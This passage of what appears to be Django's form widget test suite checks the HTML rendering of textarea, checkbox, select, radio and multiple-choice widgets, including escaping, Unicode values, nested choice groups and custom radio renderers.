self.assertHTMLEqual(w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'}), '<input type="file" class="fun" name="email" />')
def test_textarea(self):
w = Textarea()
self.assertHTMLEqual(w.render('msg', ''), '<textarea rows="10" cols="40" name="msg"></textarea>')
self.assertHTMLEqual(w.render('msg', None), '<textarea rows="10" cols="40" name="msg"></textarea>')
self.assertHTMLEqual(w.render('msg', 'value'), '<textarea rows="10" cols="40" name="msg">value</textarea>')
self.assertHTMLEqual(w.render('msg', 'some "quoted" & ampersanded value'), '<textarea rows="10" cols="40" name="msg">some "quoted" & ampersanded value</textarea>')
self.assertHTMLEqual(w.render('msg', mark_safe('pre "quoted" value')), '<textarea rows="10" cols="40" name="msg">pre "quoted" value</textarea>')
self.assertHTMLEqual(w.render('msg', 'value', attrs={'class': 'pretty', 'rows': 20}), '<textarea class="pretty" rows="20" cols="40" name="msg">value</textarea>')
# You can also pass 'attrs' to the constructor:
w = Textarea(attrs={'class': 'pretty'})
self.assertHTMLEqual(w.render('msg', ''), '<textarea rows="10" cols="40" name="msg" class="pretty"></textarea>')
self.assertHTMLEqual(w.render('msg', 'example'), '<textarea rows="10" cols="40" name="msg" class="pretty">example</textarea>')
# 'attrs' passed to render() get precedence over those passed to the constructor:
w = Textarea(attrs={'class': 'pretty'})
self.assertHTMLEqual(w.render('msg', '', attrs={'class': 'special'}), '<textarea rows="10" cols="40" name="msg" class="special"></textarea>')
self.assertHTMLEqual(w.render('msg', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'}), '<textarea rows="10" cols="40" name="msg" class="fun">\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111</textarea>')
def test_checkboxinput(self):
w = CheckboxInput()
self.assertHTMLEqual(w.render('is_cool', ''), '<input type="checkbox" name="is_cool" />')
self.assertHTMLEqual(w.render('is_cool', None), '<input type="checkbox" name="is_cool" />')
self.assertHTMLEqual(w.render('is_cool', False), '<input type="checkbox" name="is_cool" />')
self.assertHTMLEqual(w.render('is_cool', True), '<input checked="checked" type="checkbox" name="is_cool" />')
# Using any value that's not in ('', None, False, True) will check the checkbox
# and set the 'value' attribute.
self.assertHTMLEqual(w.render('is_cool', 'foo'), '<input checked="checked" type="checkbox" name="is_cool" value="foo" />')
self.assertHTMLEqual(w.render('is_cool', False, attrs={'class': 'pretty'}), '<input type="checkbox" name="is_cool" class="pretty" />')
# regression for #17114
self.assertHTMLEqual(w.render('is_cool', 0), '<input checked="checked" type="checkbox" name="is_cool" value="0" />')
self.assertHTMLEqual(w.render('is_cool', 1), '<input checked="checked" type="checkbox" name="is_cool" value="1" />')
# You can also pass 'attrs' to the constructor:
w = CheckboxInput(attrs={'class': 'pretty'})
self.assertHTMLEqual(w.render('is_cool', ''), '<input type="checkbox" class="pretty" name="is_cool" />')
# 'attrs' passed to render() get precedence over those passed to the constructor:
w = CheckboxInput(attrs={'class': 'pretty'})
self.assertHTMLEqual(w.render('is_cool', '', attrs={'class': 'special'}), '<input type="checkbox" class="special" name="is_cool" />')
# You can pass 'check_test' to the constructor. This is a callable that takes the
# value and returns True if the box should be checked.
w = CheckboxInput(check_test=lambda value: value.startswith('hello'))
self.assertHTMLEqual(w.render('greeting', ''), '<input type="checkbox" name="greeting" />')
self.assertHTMLEqual(w.render('greeting', 'hello'), '<input checked="checked" type="checkbox" name="greeting" value="hello" />')
self.assertHTMLEqual(w.render('greeting', 'hello there'), '<input checked="checked" type="checkbox" name="greeting" value="hello there" />')
self.assertHTMLEqual(w.render('greeting', 'hello & goodbye'), '<input checked="checked" type="checkbox" name="greeting" value="hello & goodbye" />')
# Ticket #17888: calling check_test shouldn't swallow exceptions
with self.assertRaises(AttributeError):
w.render('greeting', True)
# The CheckboxInput widget will return False if the key is not found in the data
# dictionary (because HTML form submission doesn't send any result for unchecked
# checkboxes).
self.assertFalse(w.value_from_datadict({}, {}, 'testing'))
value = w.value_from_datadict({'testing': '0'}, {}, 'testing')
self.assertIsInstance(value, bool)
self.assertTrue(value)
def test_select(self):
w = Select()
self.assertHTMLEqual(w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select name="beatle">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>""")
# If the value is None, none of the options are selected:
self.assertHTMLEqual(w.render('beatle', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select name="beatle">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>""")
# If the value corresponds to a label (but not to an option value), none of the options are selected:
self.assertHTMLEqual(w.render('beatle', 'John', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select name="beatle">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>""")
# Only one option can be selected, see #8103:
self.assertHTMLEqual(w.render('choices', '0', choices=(('0', '0'), ('1', '1'), ('2', '2'), ('3', '3'), ('0', 'extra'))), """<select name="choices">
<option value="0" selected="selected">0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="0">extra</option>
</select>""")
# The value is compared to its str():
self.assertHTMLEqual(w.render('num', 2, choices=[('1', '1'), ('2', '2'), ('3', '3')]), """<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
self.assertHTMLEqual(w.render('num', '2', choices=[(1, 1), (2, 2), (3, 3)]), """<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
self.assertHTMLEqual(w.render('num', 2, choices=[(1, 1), (2, 2), (3, 3)]), """<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
# The 'choices' argument can be any iterable:
from itertools import chain
def get_choices():
for i in range(5):
yield (i, i)
self.assertHTMLEqual(w.render('num', 2, choices=get_choices()), """<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>""")
things = ({'id': 1, 'name': 'And Boom'}, {'id': 2, 'name': 'One More Thing!'})
class SomeForm(Form):
somechoice = ChoiceField(choices=chain((('', '-' * 9),), [(thing['id'], thing['name']) for thing in things]))
f = SomeForm()
self.assertHTMLEqual(f.as_table(), '<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="" selected="selected">---------</option>\n<option value="1">And Boom</option>\n<option value="2">One More Thing!</option>\n</select></td></tr>')
self.assertHTMLEqual(f.as_table(), '<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="" selected="selected">---------</option>\n<option value="1">And Boom</option>\n<option value="2">One More Thing!</option>\n</select></td></tr>')
f = SomeForm({'somechoice': 2})
self.assertHTMLEqual(f.as_table(), '<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="">---------</option>\n<option value="1">And Boom</option>\n<option value="2" selected="selected">One More Thing!</option>\n</select></td></tr>')
# You can also pass 'choices' to the constructor:
w = Select(choices=[(1, 1), (2, 2), (3, 3)])
self.assertHTMLEqual(w.render('num', 2), """<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
# If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
self.assertHTMLEqual(w.render('num', 2, choices=[(4, 4), (5, 5)]), """<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>""")
# Choices are escaped correctly
self.assertHTMLEqual(w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you > me')))), """<select name="escape">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="bad">you & me</option>
<option value="good">you > me</option>
</select>""")
# Unicode choices are correctly rendered as HTML
self.assertHTMLEqual(w.render('email', 'ŠĐĆŽćžšđ', choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')]), '<select name="email">\n<option value="1">1</option>\n<option value="2">2</option>\n<option value="3">3</option>\n<option value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" selected="selected">\u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</option>\n<option value="\u0107\u017e\u0161\u0111">abc\u0107\u017e\u0161\u0111</option>\n</select>')
# If choices is passed to the constructor and is a generator, it can be iterated
# over multiple times without getting consumed:
w = Select(choices=get_choices())
self.assertHTMLEqual(w.render('num', 2), """<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>""")
self.assertHTMLEqual(w.render('num', 3), """<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3" selected="selected">3</option>
<option value="4">4</option>
</select>""")
# Choices can be nested one level in order to create HTML optgroups:
w.choices = (
('outer1', 'Outer 1'),
('Group "1"', (('inner1', 'Inner 1'), ('inner2', 'Inner 2'))),
)
self.assertHTMLEqual(w.render('nestchoice', None), """<select name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>""")
self.assertHTMLEqual(w.render('nestchoice', 'outer1'), """<select name="nestchoice">
<option value="outer1" selected="selected">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>""")
self.assertHTMLEqual(w.render('nestchoice', 'inner1'), """<select name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1" selected="selected">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>""")
def test_nullbooleanselect(self):
w = NullBooleanSelect()
self.assertTrue(w.render('is_cool', True), """<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>""")
self.assertHTMLEqual(w.render('is_cool', False), """<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>""")
self.assertHTMLEqual(w.render('is_cool', None), """<select name="is_cool">
<option value="1" selected="selected">Unknown</option>
<option value="2">Yes</option>
<option value="3">No</option>
</select>""")
self.assertHTMLEqual(w.render('is_cool', '2'), """<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>""")
self.assertHTMLEqual(w.render('is_cool', '3'), """<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>""")
def test_selectmultiple(self):
w = SelectMultiple()
self.assertHTMLEqual(w.render('beatles', ['J'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>""")
self.assertHTMLEqual(w.render('beatles', ['J', 'P'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>""")
self.assertHTMLEqual(w.render('beatles', ['J', 'P', 'R'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R" selected="selected">Ringo</option>
</select>""")
# If the value is None, none of the options are selected:
self.assertHTMLEqual(w.render('beatles', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select multiple="multiple" name="beatles">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>""")
# If the value corresponds to a label (but not to an option value), none of the options are selected:
self.assertHTMLEqual(w.render('beatles', ['John'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select multiple="multiple" name="beatles">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>""")
# Multiple options (with the same value) can be selected, see #8103:
self.assertHTMLEqual(w.render('choices', ['0'], choices=(('0', '0'), ('1', '1'), ('2', '2'), ('3', '3'), ('0', 'extra'))), """<select multiple="multiple" name="choices">
<option value="0" selected="selected">0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="0" selected="selected">extra</option>
</select>""")
# If multiple values are given, but some of them are not valid, the valid ones are selected:
self.assertHTMLEqual(w.render('beatles', ['J', 'G', 'foo'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G" selected="selected">George</option>
<option value="R">Ringo</option>
</select>""")
# The value is compared to its str():
self.assertHTMLEqual(w.render('nums', [2], choices=[('1', '1'), ('2', '2'), ('3', '3')]), """<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
self.assertHTMLEqual(w.render('nums', ['2'], choices=[(1, 1), (2, 2), (3, 3)]), """<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
self.assertHTMLEqual(w.render('nums', [2], choices=[(1, 1), (2, 2), (3, 3)]), """<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
# The 'choices' argument can be any iterable:
def get_choices():
for i in range(5):
yield (i, i)
self.assertHTMLEqual(w.render('nums', [2], choices=get_choices()), """<select multiple="multiple" name="nums">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>""")
# You can also pass 'choices' to the constructor:
w = SelectMultiple(choices=[(1, 1), (2, 2), (3, 3)])
self.assertHTMLEqual(w.render('nums', [2]), """<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>""")
# If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
self.assertHTMLEqual(w.render('nums', [2], choices=[(4, 4), (5, 5)]), """<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>""")
# Choices are escaped correctly
self.assertHTMLEqual(w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you > me')))), """<select multiple="multiple" name="escape">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="bad">you & me</option>
<option value="good">you > me</option>
</select>""")
# Unicode choices are correctly rendered as HTML
self.assertHTMLEqual(w.render('nums', ['ŠĐĆŽćžšđ'], choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')]), '<select multiple="multiple" name="nums">\n<option value="1">1</option>\n<option value="2">2</option>\n<option value="3">3</option>\n<option value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" selected="selected">\u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</option>\n<option value="\u0107\u017e\u0161\u0111">abc\u0107\u017e\u0161\u0111</option>\n</select>')
# Choices can be nested one level in order to create HTML optgroups:
w.choices = (('outer1', 'Outer 1'), ('Group "1"', (('inner1', 'Inner 1'), ('inner2', 'Inner 2'))))
self.assertHTMLEqual(w.render('nestchoice', None), """<select multiple="multiple" name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>""")
self.assertHTMLEqual(w.render('nestchoice', ['outer1']), """<select multiple="multiple" name="nestchoice">
<option value="outer1" selected="selected">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>""")
self.assertHTMLEqual(w.render('nestchoice', ['inner1']), """<select multiple="multiple" name="nestchoice">
<option value="outer1">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1" selected="selected">Inner 1</option>
<option value="inner2">Inner 2</option>
</optgroup>
</select>""")
self.assertHTMLEqual(w.render('nestchoice', ['outer1', 'inner2']), """<select multiple="multiple" name="nestchoice">
<option value="outer1" selected="selected">Outer 1</option>
<optgroup label="Group "1"">
<option value="inner1">Inner 1</option>
<option value="inner2" selected="selected">Inner 2</option>
</optgroup>
</select>""")
def test_radioselect(self):
w = RadioSelect()
self.assertHTMLEqual(w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input checked="checked" type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>""")
# If the value is None, none of the options are checked:
self.assertHTMLEqual(w.render('beatle', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>""")
# If the value corresponds to a label (but not to an option value), none of the options are checked:
self.assertHTMLEqual(w.render('beatle', 'John', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>""")
# The value is compared to its str():
self.assertHTMLEqual(w.render('num', 2, choices=[('1', '1'), ('2', '2'), ('3', '3')]), """<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>""")
self.assertHTMLEqual(w.render('num', '2', choices=[(1, 1), (2, 2), (3, 3)]), """<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>""")
self.assertHTMLEqual(w.render('num', 2, choices=[(1, 1), (2, 2), (3, 3)]), """<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>""")
# The 'choices' argument can be any iterable:
def get_choices():
for i in range(5):
yield (i, i)
self.assertHTMLEqual(w.render('num', 2, choices=get_choices()), """<ul>
<li><label><input type="radio" name="num" value="0" /> 0</label></li>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
<li><label><input type="radio" name="num" value="4" /> 4</label></li>
</ul>""")
# You can also pass 'choices' to the constructor:
w = RadioSelect(choices=[(1, 1), (2, 2), (3, 3)])
self.assertHTMLEqual(w.render('num', 2), """<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>""")
# If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
self.assertHTMLEqual(w.render('num', 2, choices=[(4, 4), (5, 5)]), """<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
<li><label><input type="radio" name="num" value="4" /> 4</label></li>
<li><label><input type="radio" name="num" value="5" /> 5</label></li>
</ul>""")
# Choices are escaped correctly
w = RadioSelect()
self.assertHTMLEqual(w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you > me')))), """<ul>
<li><label><input type="radio" name="escape" value="bad" /> you & me</label></li>
<li><label><input type="radio" name="escape" value="good" /> you > me</label></li>
</ul>""")
# Unicode choices are correctly rendered as HTML
w = RadioSelect()
self.assertHTMLEqual(six.text_type(w.render('email', 'ŠĐĆŽćžšđ', choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')])), '<ul>\n<li><label><input checked="checked" type="radio" name="email" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" /> \u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</label></li>\n<li><label><input type="radio" name="email" value="\u0107\u017e\u0161\u0111" /> abc\u0107\u017e\u0161\u0111</label></li>\n</ul>')
# Attributes provided at instantiation are passed to the constituent inputs
w = RadioSelect(attrs={'id': 'foo'})
self.assertHTMLEqual(w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul id="foo">
<li><label for="foo_0"><input checked="checked" type="radio" id="foo_0" value="J" name="beatle" /> John</label></li>
<li><label for="foo_1"><input type="radio" id="foo_1" value="P" name="beatle" /> Paul</label></li>
<li><label for="foo_2"><input type="radio" id="foo_2" value="G" name="beatle" /> George</label></li>
<li><label for="foo_3"><input type="radio" id="foo_3" value="R" name="beatle" /> Ringo</label></li>
</ul>""")
# Attributes provided at render-time are passed to the constituent inputs
w = RadioSelect()
self.assertHTMLEqual(w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')), attrs={'id': 'bar'}), """<ul id="bar">
<li><label for="bar_0"><input checked="checked" type="radio" id="bar_0" value="J" name="beatle" /> John</label></li>
<li><label for="bar_1"><input type="radio" id="bar_1" value="P" name="beatle" /> Paul</label></li>
<li><label for="bar_2"><input type="radio" id="bar_2" value="G" name="beatle" /> George</label></li>
<li><label for="bar_3"><input type="radio" id="bar_3" value="R" name="beatle" /> Ringo</label></li>
</ul>""")
def test_radiofieldrenderer(self):
# RadioSelect uses a RadioFieldRenderer to render the individual radio inputs.
# You can manipulate that object directly to customize the way the RadioSelect
# is rendered.
w = RadioSelect()
r = w.get_renderer('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
inp_set1 = []
inp_set2 = []
inp_set3 = []
inp_set4 = []
for inp in r:
inp_set1.append(str(inp))
inp_set2.append('%s<br />' % inp)
inp_set3.append('<p>%s %s</p>' % (inp.tag(), inp.choice_label))
inp_set4.append('%s %s %s %s %s' % (inp.name, inp.value, inp.choice_value, inp.choice_label, inp.is_checked()))
self.assertHTMLEqual('\n'.join(inp_set1), """<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label>
<label><input type="radio" name="beatle" value="P" /> Paul</label>
<label><input type="radio" name="beatle" value="G" /> George</label>
<label><input type="radio" name="beatle" value="R" /> Ringo</label>""")
self.assertHTMLEqual('\n'.join(inp_set2), """<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label><br />
<label><input type="radio" name="beatle" value="P" /> Paul</label><br />
<label><input type="radio" name="beatle" value="G" /> George</label><br />
<label><input type="radio" name="beatle" value="R" /> Ringo</label><br />""")
self.assertHTMLEqual('\n'.join(inp_set3), """<p><input checked="checked" type="radio" name="beatle" value="J" /> John</p>
<p><input type="radio" name="beatle" value="P" /> Paul</p>
<p><input type="radio" name="beatle" value="G" /> George</p>
<p><input type="radio" name="beatle" value="R" /> Ringo</p>""")
self.assertHTMLEqual('\n'.join(inp_set4), """beatle J J John True
beatle J P Paul False
beatle J G George False
beatle J R Ringo False""")
# A RadioFieldRenderer object also allows index access to individual RadioChoiceInput
w = RadioSelect()
r = w.get_renderer('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
self.assertHTMLEqual(str(r[1]), '<label><input type="radio" name="beatle" value="P" /> Paul</label>')
self.assertHTMLEqual(str(r[0]), '<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label>')
self.assertTrue(r[0].is_checked())
self.assertFalse(r[1].is_checked())
self.assertEqual((r[1].name, r[1].value, r[1].choice_value, r[1].choice_label), ('beatle', 'J', 'P', 'Paul'))
# These individual widgets can accept extra attributes if manually rendered.
self.assertHTMLEqual(
r[1].render(attrs={'extra': 'value'}),
'<label><input type="radio" extra="value" name="beatle" value="P" /> Paul</label>'
)
with self.assertRaises(IndexError):
r[10]
# You can create your own custom renderers for RadioSelect to use.
class MyRenderer(RadioFieldRenderer):
def render(self):
return '<br />\n'.join(six.text_type(choice) for choice in self)
w = RadioSelect(renderer=MyRenderer)
self.assertHTMLEqual(w.render('beatle', 'G', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<label><input type="radio" name="beatle" value="J" /> John</label><br />
<label><input type="radio" name="beatle" value="P" /> Paul</label><br />
<label><input checked="checked" type="radio" name="beatle" value="G" /> George</label><br />
<label><input type="radio" name="beatle" value="R" /> Ringo</label>""")
# Or you can use custom RadioSelect fields that use your custom renderer.
class CustomRadioSelect(RadioSelect):
renderer = MyRenderer
w = CustomRadioSelect()
self.assertHTMLEqual(w.render('beatle', 'G', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<label><input type="radio" name="beatle" value="J" /> John</label><br />
<label><input type="radio" name="beatle" value="P" /> Paul</label><br />
<label><input checked="checked" type="radio" name="beatle" value="G" /> George</label><br />
<label><input type="radio" name="beatle" value="R" /> Ringo</label>""")
# You can customize rendering with outer_html/inner_html renderer variables (#22950)
class MyRenderer(RadioFieldRenderer):
outer_html = str('<div{id_attr}>{content}</div>') # str is just to test some Python 2 issue with bytestrings
inner_html = '<p>{choice_value}{sub_widgets}</p>'
w = RadioSelect(renderer=MyRenderer)
output = w.render('beatle', 'J',
choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')),
attrs={'id': 'bar'})
self.assertIsInstance(output, SafeData)
self.assertHTMLEqual(output, """<div id="bar">
<p><label for="bar_0"><input checked="checked" type="radio" id="bar_0" value="J" name="beatle" /> John</label></p>
<p><label for="bar_1"><input type="radio" id="bar_1" value="P" name="beatle" /> Paul</label></p>
<p><label for="bar_2"><input type="radio" id="bar_2" value="G" name="beatle" /> George</label></p>
<p><label for="bar_3"><input type="radio" id="bar_3" value="R" name="beatle" /> Ringo</label></p>
</div>""")
def test_nested_choices(self):
# Choices can be nested for radio buttons:
w = RadioSelect()
w.choices = (
('unknown', 'Unknown'),
('Audio', (('vinyl', 'Vinyl'), ('cd', 'CD'))),
('Video', (('vhs', 'VHS'), ('dvd', 'DVD'))),
)
self.assertHTMLEqual(w.render('nestchoice', 'dvd', attrs={'id': 'media'}), """<ul id="media">
<li><label for="media_0"><input id="media_0" name="nestchoice" type="radio" value="unknown" /> Unknown</label></li>
<li>Audio<ul id="media_1">
<li><label for="media_1_0"><input id="media_1_0" name="nestchoice" type="radio" value="vinyl" /> Vinyl</label></li>
<li><label for="media_1_1"><input id="media_1_1" name="nestchoice" type="radio" value="cd" /> CD</label></li>
</ul></li>
<li>Video<ul id="media_2">
<li><label for="media_2_0"><input id="media_2_0" name="nestchoice" type="radio" value="vhs" /> VHS</label></li>
<li><label for="media_2_1"><input checked="checked" id="media_2_1" name="nestchoice" type="radio" value="dvd" /> DVD</label></li>
</ul></li>
</ul>""")
# Choices can be nested for checkboxes:
w = CheckboxSelectMultiple()
w.choices = (
('unknown', 'Unknown'),
('Audio', (('vinyl', 'Vinyl'), ('cd', 'CD'))),
('Video', (('vhs', 'VHS'), ('dvd', 'DVD'))),
)
self.assertHTMLEqual(w.render('nestchoice', ('vinyl', 'dvd'), attrs={'id': 'media'}), """<ul id="media">
<li><label for="media_0"><input id="media_0" name="nestchoice" type="checkbox" value="unknown" /> Unknown</label></li>
<li>Audio<ul id="media_1">
<li><label for="media_1_0"><input checked="checked" id="media_1_0" name="nestchoice" type="checkbox" value="vinyl" /> Vinyl</label></li>
<li><label for="media_1_1"><input id="media_1_1" name="nestchoice" type="checkbox" value="cd" /> CD</label></li>
</ul></li>
<li>Video<ul id="media_2">
<li><label for="media_2_0"><input id="media_2_0" name="nestchoice" type="checkbox" value="vhs" /> VHS</label></li>
<li><label for="media_2_1"><input checked="checked" id="media_2_1" name="nestchoice" type="checkbox" value="dvd" /> DVD</label></li>
</ul></li>
</ul>""")
def test_checkboxselectmultiple(self):
w = CheckboxSelectMultiple()
self.assertHTMLEqual(w.render('beatles', ['J'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>""")
self.assertHTMLEqual(w.render('beatles', ['J', 'P'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
